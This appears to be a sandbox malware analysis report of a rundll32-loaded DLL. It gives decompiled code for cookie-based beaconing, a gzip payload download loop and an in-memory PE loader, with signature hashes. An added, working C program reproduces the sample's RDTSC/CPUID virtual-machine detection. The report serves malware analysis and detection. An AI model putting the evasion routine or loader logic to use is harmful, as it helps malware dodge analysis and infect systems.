                                              				__eax = E000007FE7FEF7538E8D(__eax, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r11, __r12, __r13, __r14, __r15);
                                              				if (__ah == __ah) goto 0xf753399d;
                                              				_v88 = __al;
                                              				__rax = _v72;
                                              				if (__dx == __dx) goto 0xf7533990;
                                              				r8d = r8d + 0xf;
                                              				__edx = 0;
                                              				if (__dl == __dl) goto 0xf7533934;
                                              				__rax = __rcx;
                                              				__al =  *__rax;
                                              				if (__bx == __bx) goto 0xf7533945;
                                              				__rcx = _a16;
                                              				__r8 =  *__rcx;
                                              				__eax = E000007FE7FEF7533B56(__ecx, 0, __ebp, __rax, __rdx, __rsi, __rbp, __r8, __r11, __r13, __r14);
                                              				goto 0xf7533b0f;
                                              				__rax = __rcx;
                                              				__al =  *((intOrPtr*)(__rax + 1));
                                              				if (__di == __di) goto 0xf7533927;
                                              				_v64 = _v64 + __rax;
                                              				if (__ax == __ax) goto 0xf7533985;
                                              				__eax = E000007FE7FEF753A588(__eax, __rbx, __rdx, __rdi, __r9, __r10, __r11, __r13, __r15);
                                              				__rax =  *((intOrPtr*)(__rax + 0x60));
                                              				goto 0xf7533967;
                                              				if (__eax != 0) goto 0xf75339b9;
                                              				if (_v80 - 2 < 0) goto 0xf75339b9;
                                              				goto E000007FE7FEF75336FA;
                                              				_v80 = _v80 >> 1;
                                              				goto 0xf753373d;
                                              				__rsp = __rsp + 0x78;
                                              				return __eax;
			}

                                              Disassembly listing for 0x7fef75336fa to 0x7fef75339ca (only the instruction address column survived extraction; the instruction text is not reproduced here)

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
                                              • Instruction ID: eea735149a1d30d49bcd2fea519f552185231c9fc5e7a59b1faca744e8d541c8
                                              • Opcode Fuzzy Hash: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
                                              • Instruction Fuzzy Hash: 3F317E66F2DA8681EAF0DA45D45037DA6D3E385B94F944139FE8E47BB4CE3CE9848700
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
                                              • Instruction ID: 91c5236132e037b4dad52b7741e0f6a58db73a54ac04ee9c9214898af67bde3f
                                              • Opcode Fuzzy Hash: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
                                              • Instruction Fuzzy Hash: 38D05E72A1024483E775D720A5063A93321A398359F80C205E64908954CF7DC25CC705
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 67%
                                              			E00000001180002AC0(intOrPtr __ebx, intOrPtr __edx, void* __eflags, signed int __rax, long long __rbx, signed int __rdx, long long __rsi) {
                                              				signed int _t18;
                                              				signed long long _t42;
                                              				long long _t52;
                                              				void* _t55;
                                              				void* _t56;
                                              
                                              				 *((long long*)(_t55 + 8)) = __rbx;
                                              				 *((long long*)(_t55 + 0x10)) = _t52;
                                              				 *((long long*)(_t55 + 0x18)) = __rsi;
                                              				_t56 = _t55 - 0x30;
                                              				SwitchToThread();
                                              				asm("rdtsc");
                                              				_t42 = __rdx << 0x20;
                                              				asm("cpuid");
                                              				 *((intOrPtr*)(_t56 + 0x20)) = 1;
                                              				 *((intOrPtr*)(_t56 + 0x24)) = __ebx;
                                              				 *((intOrPtr*)(_t56 + 0x28)) = 0;
                                              				 *((intOrPtr*)(_t56 + 0x2c)) = __edx;
                                              				asm("rdtsc");
                                              				_t43 = _t42 << 0x20;
                                              				_t18 = SwitchToThread();
                                              				asm("rdtsc");
                                              				asm("rdtsc");
                                              				if (__eflags != 0) goto 0x80002adb;
                                              				return _t18 / (__rsi + ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020 | _t43 << 0x00000020 << 0x00000020) - ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020));
			}

                                              Disassembly listing for 0x180002ac0 to 0x180002b59 (only the instruction address column survived extraction; the instruction text is not reproduced here)

                                              APIs
                                              • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002ADB
                                              • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002B15
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: SwitchThread
                                              • String ID:
                                              • API String ID: 115865932-0
                                              • Opcode ID: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
                                              • Instruction ID: 31e80d72c3d44f8f19491c3afcfcc8ffca94b91b5460d3bc01de11eb56bf2daf
                                              • Opcode Fuzzy Hash: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
                                              • Instruction Fuzzy Hash: 93019EB2B24A948BDF64CB26B600389B6A2E38C7C0F14C535EB9D43B18DA3CD5958B04
                                              Uniqueness

                                              Uniqueness Score: -1.00%
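The function E00000001180002AC0 above is the check behind the "Tries to detect virtualization through RDTSC time measurements" and "CPUID execution measurement" signatures: yield with SwitchToThread, read the TSC, execute CPUID, read the TSC again, and compare the difference against a limit. The following is an added example in C, written for this report and not code from the sample or from Joe Sandbox, that performs the same measurement in a readable form and generalizes it from the single sample the decompilation shows to a median over several samples. The 1000-cycle threshold (VM_THRESHOLD_CYCLES), the 32-sample count and the function names are assumptions; the report does not show which limit the sample compares against. On POSIX builds sched_yield stands in for SwitchToThread.

```c
/* Added example (not code from the sample or from Joe Sandbox): the
 * RDTSC/CPUID timing check behind E00000001180002AC0, extended to a median
 * over several samples. Threshold and sample count are assumptions. */
#define _GNU_SOURCE
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#if defined(_WIN32)
#  include <windows.h>
#  include <intrin.h>
static uint64_t rdtsc64(void) { return __rdtsc(); }
static void cpuid_leaf(uint32_t leaf) { int r[4]; __cpuid(r, (int)leaf); (void)r; }
static void yield_cpu(void) { SwitchToThread(); }   /* same API the sample calls */
#  define HAVE_X86_TSC 1
#elif defined(__x86_64__) || defined(__i386__)
#  include <cpuid.h>
#  include <sched.h>
static uint64_t rdtsc64(void) {
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
}
static void cpuid_leaf(uint32_t leaf) {
    uint32_t a, b, c, d;
    __cpuid(leaf, a, b, c, d);          /* GCC/Clang macro from <cpuid.h> */
    (void)a; (void)b; (void)c; (void)d;
}
static void yield_cpu(void) { sched_yield(); }      /* POSIX stand-in for SwitchToThread */
#  define HAVE_X86_TSC 1
#else
#  define HAVE_X86_TSC 0
#endif

int tsc_supported(void) { return HAVE_X86_TSC; }

/* One sample: yield first, as the sample does with SwitchToThread, so the
 * measurement is less likely to be interrupted; then time a single CPUID
 * between two RDTSC reads. CPUID is an unconditional VM exit under VT-x and
 * AMD-V, so inside a VM the delta also contains the hypervisor round trip. */
uint64_t time_one_cpuid(void) {
#if HAVE_X86_TSC
    yield_cpu();
    uint64_t t0 = rdtsc64();
    cpuid_leaf(1);
    uint64_t t1 = rdtsc64();
    return t1 - t0;
#else
    return 0;   /* no x86 TSC on this build */
#endif
}

/* Insertion sort; sample counts are tiny, so O(n^2) is fine. */
static void sort_u64(uint64_t *v, size_t n) {
    for (size_t i = 1; i < n; i++) {
        uint64_t key = v[i];
        size_t j = i;
        while (j > 0 && v[j - 1] > key) { v[j] = v[j - 1]; j--; }
        v[j] = key;
    }
}

/* Median of n samples (sorts v in place). A median rather than a mean keeps one
 * interrupt or context switch in a single sample from deciding the verdict. */
uint64_t median_u64(uint64_t *v, size_t n) {
    if (n == 0) return 0;
    sort_u64(v, n);
    return v[n / 2];
}

#define MAX_SAMPLES 64
uint64_t measure_cpuid_median(size_t samples) {
    uint64_t buf[MAX_SAMPLES];
    if (samples == 0) samples = 1;
    if (samples > MAX_SAMPLES) samples = MAX_SAMPLES;
    for (size_t i = 0; i < samples; i++) buf[i] = time_one_cpuid();
    return median_u64(buf, samples);
}

/* Assumed limit (hypothetical): on bare metal CPUID retires in a few hundred
 * cycles, while a VM exit and re-entry usually costs well over a thousand. */
#define VM_THRESHOLD_CYCLES 1000ULL
int looks_virtualized(uint64_t median_cycles, uint64_t threshold) {
    return median_cycles > threshold;
}

int main(void) {
    if (!tsc_supported()) { puts("no x86 TSC on this build"); return 0; }
    uint64_t med = measure_cpuid_median(32);
    printf("median CPUID cost: %llu cycles -> %s\n", (unsigned long long)med,
           looks_virtualized(med, VM_THRESHOLD_CYCLES) ? "likely virtualized"
                                                       : "likely bare metal");
    return 0;
}
```

The measured number is noisy and depends on the CPU, the hypervisor and whether TSC offsetting or scaling is enabled, so a fixed threshold produces both false positives and false negatives; for analysis, the usual countermeasures are to patch the comparison after the measurement or to run the sample on a host where the CPUID exit cost is below the limit it uses.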

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wsprintf$AddressLibraryLoadProc
                                              • String ID: %s%u$; _gat=$NTDLL.DLL$RtlGetVersion
                                              • API String ID: 1873754389-181482773
                                              • Opcode ID: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
                                              • Instruction ID: b0e16dee8d78cd610c3fce9f61b73237315bc0fd6264dbce3c4a8d294556f37b
                                              • Opcode Fuzzy Hash: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
                                              • Instruction Fuzzy Hash: A1311872B00A4991EA62DB11F854BE97360FB9CBC5F848126EA0D67B65DF3CC61EC340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                               • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrcat$FolderPath
                                              • String ID: c:\ProgramData\
                                              • API String ID: 2440492483-4167965204
                                              • Opcode ID: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
                                              • Instruction ID: 13a3a00d3bf98ac6014c4b177c238986472ee82a99ac8020d1391539c79a1c4f
                                              • Opcode Fuzzy Hash: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
                                              • Instruction Fuzzy Hash: A8213472204B84C6EB52DF21E8043EAB765F758BC4F888021EE990BB69CF78C25DC714
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                               • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$CreateDirectoryFolderPathlstrcpy
                                              • String ID: c:\ProgramData\
                                              • API String ID: 1583731639-4167965204
                                              • Opcode ID: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
                                              • Instruction ID: 6a04e3bab3544b7625e32e0bbe63c8079b4262e858a91f78b1d04aa0cec903dd
                                              • Opcode Fuzzy Hash: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
                                              • Instruction Fuzzy Hash: 4B211A72214A8A96EB51CF11E8447CE7364F788BC8F959022EA5E57668DF38C60ECB44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 25%
                                              			E000000011800027B4(void* __rax, void* __rbx, void* __rcx, void* _a8) {
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				void* __rdi;
                                              				void* _t20;
                                              				void* _t45;
                                              
                                              				E00000001180002C88(_t20, __rbx,  &_v24, __rcx, _t45, __rbx);
                                              				r9d = _v24;
                                              				wsprintfW(??, ??);
                                              				r9d = _v20;
                                              				wsprintfW(??, ??);
                                              				r9d = _v12;
                                              				wsprintfW(??, ??);
                                              				r9d = _v16;
                                              				wsprintfW(??, ??);
                                              				return __rax;
                                               			}

                                               Instruction addresses: 0x1800027c6, 0x1800027cb, 0x1800027e1, 0x1800027e7, 0x180002801, 0x180002807, 0x180002824, 0x18000282a, 0x180002847, 0x18000285c

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                               • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wsprintf
                                              • String ID: %s%u$; _ga=
                                              • API String ID: 2111968516-3272795577
                                              • Opcode ID: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
                                              • Instruction ID: 8dfdff9f2ba73ed5fda4775318dfd5996efea46270aa07bd7b9716fa6782b752
                                              • Opcode Fuzzy Hash: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
                                              • Instruction Fuzzy Hash: 80119672704A4A92DA62CF14F5547E97320FB5C789F848226EA4D27A76DE3CC62EC740
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 43%
                                              			E00000001180001D80(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, intOrPtr* __r8, long long* __r9, void* __r11, void* __r14, long long _a8, long long _a16, long long _a24) {
                                              				void* _v8;
                                              				char _v136;
                                              				void* __rdi;
                                              				void* _t12;
                                              				char* _t37;
                                              				intOrPtr* _t51;
                                              				void* _t66;
                                              
                                              				_t66 = __r11;
                                              				_a8 = __rbx;
                                              				_a16 = __rbp;
                                              				_a24 = __rsi;
                                              				_t51 = __r8;
                                              				wsprintfW(??, ??);
                                              				_t12 = E00000001180001B08( &_v136, __rdx, __r8, __r9);
                                              				_t37 =  *_t51;
                                              				if (_t12 == 0x194) goto 0x80001e2e;
                                              				if (_t12 != 0xc8) goto 0x80001e01;
                                              				if (_t37 == 0) goto 0x80001e1a;
                                              				if ( *__r9 - 0x400 < 0) goto 0x80001e01;
                                              				if ( *_t37 != 0x1f) goto 0x80001e01;
                                              				if ( *((char*)(_t37 + 1)) != 0x8b) goto 0x80001e01;
                                              				if (E00000001180001760(_t37, _t51, __r9, __r9, _t51, _t66, __r14) != 0) goto 0x80001e27;
                                              				if (_t37 == 0) goto 0x80001e1a;
                                              				GetProcessHeap();
                                              				HeapFree(??, ??, ??);
                                              				Sleep(??);
                                              				goto 0x80001db5;
                                              				goto 0x80001e49;
                                              				if (_t37 == 0) goto 0x80001e47;
                                              				GetProcessHeap();
                                              				HeapFree(??, ??, ??);
                                              				return 0;
                                               			}

                                               Instruction addresses: 0x180001d80, 0x180001d80, 0x180001d85, 0x180001d8a, 0x180001d97, 0x180001daf, 0x180001dc3, 0x180001dc8, 0x180001dd0, 0x180001dd7, 0x180001ddc, 0x180001de5, 0x180001dea, 0x180001df0, 0x180001dff, 0x180001e04, 0x180001e06, 0x180001e14, 0x180001e1f, 0x180001e25, 0x180001e2c, 0x180001e31, 0x180001e33, 0x180001e41, 0x180001e61

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                               • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$FreeProcess$Sleepwsprintf
                                              • String ID:
                                              • API String ID: 2048420019-0
                                              • Opcode ID: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
                                              • Instruction ID: a2cd984f53a93593caa01796726c62d074961a460daaaee6897d674b1d8fdaee
                                              • Opcode Fuzzy Hash: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
                                              • Instruction Fuzzy Hash: 06213872604BC8CAFBA2DB22E4043D97295AB5DBC2F48C131EF495B795DF38C6498341
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 33%
                                              			E00000001180001B5C(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
                                              				void* _t13;
                                              				void* _t29;
                                              
                                              				_a8 = __rbx;
                                              				_a16 = __rsi;
                                              				_t13 = __edx;
                                              				GetProcessHeap();
                                              				r8d = 0x2001;
                                              				HeapAlloc(??, ??, ??);
                                              				if (__rax == 0) goto 0x80001bc2;
                                              				E000000011800014B4(__rax, __rax, __rax, L"Cookie: _s=", __rcx, _t29, __rcx);
                                              				r9d = _t13;
                                              				return wsprintfW(??, ??);
                                               			}

                                               Instruction addresses: 0x180001b5c, 0x180001b61, 0x180001b6b, 0x180001b70, 0x180001b7b, 0x180001b84, 0x180001b90, 0x180001b9f, 0x180001ba4, 0x180001bd1

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                               • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$AllocFreewsprintf
                                              • String ID: %s%u$Cookie: _s=
                                              • API String ID: 4121094037-887366058
                                              • Opcode ID: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
                                              • Instruction ID: 843dd351c34123922bb2a738a6afe93933f5c472e56c7fab694ad2d1448e7ea3
                                              • Opcode Fuzzy Hash: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
                                              • Instruction Fuzzy Hash: 65F03772700B8981EA92CB0AF4443D93660F78CBC0F489124EE4E1B76ADE3CC64AC340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 29%
                                              			E00000001180002B5C(signed int __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* _a8, long long _a16, long long _a24, long long _a32) {
                                              				void* __rdi;
                                              				signed int _t43;
                                              				intOrPtr _t54;
                                              				void* _t56;
                                              				void* _t61;
                                              				signed long long _t63;
                                              				void* _t66;
                                              				void* _t68;
                                              				signed long long _t69;
                                              				void* _t78;
                                              				signed int _t80;
                                              				intOrPtr* _t89;
                                              
                                              				_t68 = __rcx;
                                              				_t63 = __rax;
                                              				_a16 = __rbx;
                                              				_a24 = __rbp;
                                              				_a32 = __rsi;
                                              				_t66 = __rcx;
                                              				r8d = 0x3000;
                                              				_t5 = _t68 + 4; // 0x4
                                              				r9d = _t5;
                                              				VirtualAlloc(??, ??, ??, ??);
                                              				_t80 = __rax;
                                              				if (__rax != 0) goto 0x80002baa;
                                              				GetLastError();
                                              				goto 0x80002c72;
                                              				_t54 =  *((intOrPtr*)(__rcx + 0x1c));
                                              				if (_t54 <= 0) goto 0x80002bf1;
                                              				_t69 = __rax * 0x11;
                                              				r8d =  *(_t69 + __rcx + 0x28);
                                              				r10d =  *((intOrPtr*)(_t69 + __rcx + 0x20));
                                              				_t89 = __r8 + __rcx;
                                              				r9d =  *((intOrPtr*)(_t69 + __rcx + 0x2c));
                                              				if (_t54 == 0) goto 0x80002bea;
                                              				if (_t89 == 0) goto 0x80002bea;
                                              				_t56 = __r9;
                                              				if (_t56 == 0) goto 0x80002bea;
                                              				 *((char*)(__r10 + __rax)) =  *_t89;
                                              				if (_t56 != 0) goto 0x80002bd8;
                                              				if (1 -  *((intOrPtr*)(__rcx + 0x1c)) < 0) goto 0x80002bb1;
                                              				if (E00000001180001A3C(1 -  *((intOrPtr*)(__rcx + 0x1c)), __rax, __rcx, __rax, __rcx, __rax) != 0) goto 0x80002c07;
                                              				goto 0x80002c72;
                                              				if (E00000001180001E64(__rcx, __rax, __rcx, _t78, __rax, __rdx) != 0) goto 0x80002c28;
                                              				GetLastError();
                                              				goto 0x80002c72;
                                              				if ( *((intOrPtr*)(_t66 + 0x1c)) <= 0) goto 0x80002c56;
                                              				r8d =  *(_t63 * 0x11 + _t66 + 0x30) & 0x000000ff;
                                              				VirtualProtect(??, ??, ??, ??);
                                              				_t61 = 1 -  *((intOrPtr*)(_t66 + 0x1c));
                                              				if (_t61 < 0) goto 0x80002c2d;
                                              				if (_t61 == 0) goto 0x80002c72;
                                              				 *((long long*)(_t63 + _t80))();
                                              				_t43 = GetLastError();
                                              				asm("bts eax, 0x1b");
                                              				return _t43 & 0x00ffffff;
                                               			}

                                               Instruction addresses: 0x180002b5c, 0x180002b5c, 0x180002b5c, 0x180002b61, 0x180002b66, 0x180002b73, 0x180002b79, 0x180002b81, 0x180002b81, 0x180002b85, 0x180002b8d, 0x180002b93, 0x180002b95, 0x180002ba5, 0x180002bac, 0x180002baf, 0x180002bb3, 0x180002bb7, 0x180002bbc, 0x180002bc1, 0x180002bc4, 0x180002bcc, 0x180002bd1, 0x180002bd3, 0x180002bd6, 0x180002bde, 0x180002be8, 0x180002bef, 0x180002bfe, 0x180002c05, 0x180002c14, 0x180002c16, 0x180002c26, 0x180002c2b, 0x180002c38, 0x180002c49, 0x180002c51, 0x180002c54, 0x180002c5c, 0x180002c61, 0x180002c63, 0x180002c6e, 0x180002c86

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                               • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocErrorLastVirtual
                                              • String ID:
                                              • API String ID: 497505419-0
                                              • Opcode ID: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
                                              • Instruction ID: ea269a028a1356371e25c0c3e3ed4ebc626b70e9dbdbba68532a1a5be3ab6bd4
                                              • Opcode Fuzzy Hash: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
                                              • Instruction Fuzzy Hash: C831047270464886F697DF19A8007EC7760F74DBD4F28C224FE4A47799CE28CA4B8B00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 30%
                                              			E000000011800014B4(unsigned long long __rax, long long __rbx, void* __rcx, signed short* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
                                              				signed int _t18;
                                              				unsigned long long _t40;
                                              				signed long long _t44;
                                              				void* _t48;
                                              				intOrPtr* _t53;
                                              				void* _t57;
                                              				char* _t65;
                                              
                                              				_t40 = __rax;
                                              				_a8 = __rbx;
                                              				_a16 = __rbp;
                                              				_a24 = __rsi;
                                              				_t18 =  *__rdx & 0x0000ffff;
                                              				_t57 = __rcx;
                                              				if (_t18 == 0) goto 0x800014f1;
                                              				 *(__rcx - __rdx + __rdx) = _t18;
                                              				_t44 = __rbx + 1;
                                              				if ((__rdx[1] & 0x0000ffff) != 0) goto 0x800014dd;
                                              				_t48 = __r8;
                                              				E00000001180001604(__rax, _t44, __r8, __rcx);
                                              				_t53 =  !=  ? _t40 : "error";
                                              				if ( *_t53 == 0) goto 0x80001543;
                                              				_t65 = "0123456789ABCDEF";
                                              				 *((short*)(_t57 + _t44 * 2)) =  *((char*)((_t40 >> 4) + _t65));
                                              				 *((short*)(_t57 + 2 + _t44 * 2)) =  *((char*)(_t48 + _t65));
                                              				if ( *((intOrPtr*)(_t53 + 1)) != 0) goto 0x80001517;
                                              				 *((short*)(_t57 + (_t44 + 2) * 2)) = 0;
                                              				if (_t40 == 0) goto 0x80001560;
                                              				GetProcessHeap();
                                              				return HeapFree(??, ??, ??);
                                               			}

                                               Instruction addresses: 0x1800014b4, 0x1800014b4, 0x1800014b9, 0x1800014be, 0x1800014c8, 0x1800014cd, 0x1800014d5, 0x1800014dd, 0x1800014e2, 0x1800014ef, 0x1800014f1, 0x1800014f4, 0x180001506, 0x18000150e, 0x180001510, 0x18000152b, 0x180001534, 0x180001541, 0x180001543, 0x18000154a, 0x18000154c, 0x180001577

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
